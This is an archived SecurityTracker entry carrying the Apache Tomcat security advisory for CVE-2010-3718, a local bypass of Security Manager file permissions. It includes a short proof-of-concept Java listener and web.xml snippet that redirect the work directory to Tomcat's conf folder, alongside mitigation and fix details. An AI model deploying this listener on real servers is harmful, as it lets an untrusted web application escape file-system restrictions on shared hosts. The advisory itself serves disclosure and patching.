SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Apache Tomcat Vendors:   Apache Software Foundation
Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
SecurityTracker Alert ID:  1025025
SecurityTracker URL:  http://securitytracker.com/id/1025025
CVE Reference:   CVE-2010-3718   (Links to External Site)
Date:  Feb 7 2011
Impact:   Modification of system information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 5.5.x, 6.0.x, 7.0.0 to 7.0.3
Description:   A vulnerability was reported in Tomcat. A local user can obtain elevated privileges on the target system.

A web application can bypass Security Manager file permissions and grant read/write permissions to areas of the file system.
Impact:   A local user can obtain elevated privileges on the target system.
Solution:   The vendor has issued a fix (7.0.4).
Vendor URL:  tomcat.apache.org/security.html (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
May 20 2011 (Red Hat Issues Fix) Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
Red Hat has issued a fix for Red Hat Enterprise Linux 6.
Dec 21 2011 (Red Hat Issues Fix) Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
Red Hat has issued a fix for Red Hat Enterprise Linux 5.


 Source Message Contents
Subject:  [SECURITY] CVE-2010-3718 Apache Tomcat Local bypass of security manger file permissions

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

CVE-2010-3718 Apache Tomcat Local bypass of security manger file permissions

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected:
- - Tomcat 7.0.0 to 7.0.3
- - Tomcat 6.0.0 to 6.0.?
- - Tomcat 5.5.0 to 5.5.?
- - Earlier, unsupported versions may also be affected

Description:
When running under a SecurityManager, access to the file system is
limited but web applications are granted read/write permissions to the
work directory. This directory is used for a variety of temporary files
such as the intermediate files generated when compiling JSPs to Servlets.
The location of the work directory is specified by a ServletContect
attribute that is meant to be read-only to web applications. However,
due to a coding error, the read-only setting was not applied. Therefore
a malicious web application may modify the attribute before Tomcat
applies the file permissions. This can be used to grant read/write
permissions to any area on the file system which a malicious web
application may then take advantage of.
This vulnerability is only applicable when hosting web applications from
untrusted sources such as shared hosting environments.

Example (AL2 licensed):

Listener source
- ---------------
package listeners;
import javax.servlet.ServletContext;
import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;

public final class FooListener implements ServletContextListener {
    public void contextInitialized(ServletContextEvent event) {
        ServletContext context = event.getServletContext();
        java.io.File workdir = (java.io.File) context
                .getAttribute("javax.servlet.context.tempdir");
        if (workdir.toString().indexOf("..") < 0) {
            context.setAttribute("javax.servlet.context.tempdir",
                    new java.io.File(workdir, "../../../../conf"));
        }
    }
    public void contextDestroyed(ServletContextEvent event) {
    }
}

web.xml snippet
- ---------------
<listener>
  <listener-class>listeners.FooListener</listener-class>
</listener>


Mitigation:
Users of affected versions should apply one of the following mitigations:
- - Upgrade to a Tomcat version where this issue is fixed
- - Undeploy all web applications from untrusted sources

Credit:
The issue was identified by the Tomcat security team.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBAgAGBQJNTLBXAAoJEBDAHFovYFnnkQkQAIpE68EHXYnu70xHFThPVGPk
48OIvAA2fMzF8RajaGQRkOS3WXrzPdbjf8AXjUmZ/E3Yr+4XdP2kmDMGsW9hs/Vw
x2fXYfyBQQQMdKVnSVr3cMSPs+RhnSpPI1wsQUWnp0xZNez/9VkSDeINq8JFGXLB
5NgkQZ4+6UBBl2K/mtkVxZHnXi1y9ulvhaQ95jCTt7mzOUJrlq8NXWaEW1njtGAO
7Z6KBMn6PQkzx1k38TG6kPBN331fWWE2WhSimMkX1Q8jfI5f0PVPaQELPKieSf7x
G0zCfQ8aH0q4Kn0jsvvmP43mzCz3PbBwOpFZgPO0vcA5usXwFXGTJCKAhhCTy0CG
q9Sjxb8hLyEwg0vIrvzzlPj6g8mm6syW7Db4R4F3vW/ovCWgVdRFMhl0e/KX3nfG
MWSYq/x4wFj470/j5Ak7wz2y/GAiX9LiEwhFlEWL/SOevY9/u3l9dXIUbcYUG3mS
4dBpthU5eJc2vbdp+gtAPoJexxS9nZhCfbcNjV5HbdRHhn1dIaJhR3KYnqQU2wX2
CG2srHqTJ+3aW969nhHxgpiLmElmDlWHMNQmDDDaY9CDC2i3ZNdw4uBes4nRc7Xg
/1LQvx7pSnAidrQa6CcOjsf4usBQ6faO0zeuri9l6jwFDfwHiL/TuNzNxgmbR8BC
DgZJ/zI6FepuWKA4CV7t
=uz7D
-----END PGP SIGNATURE-----


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC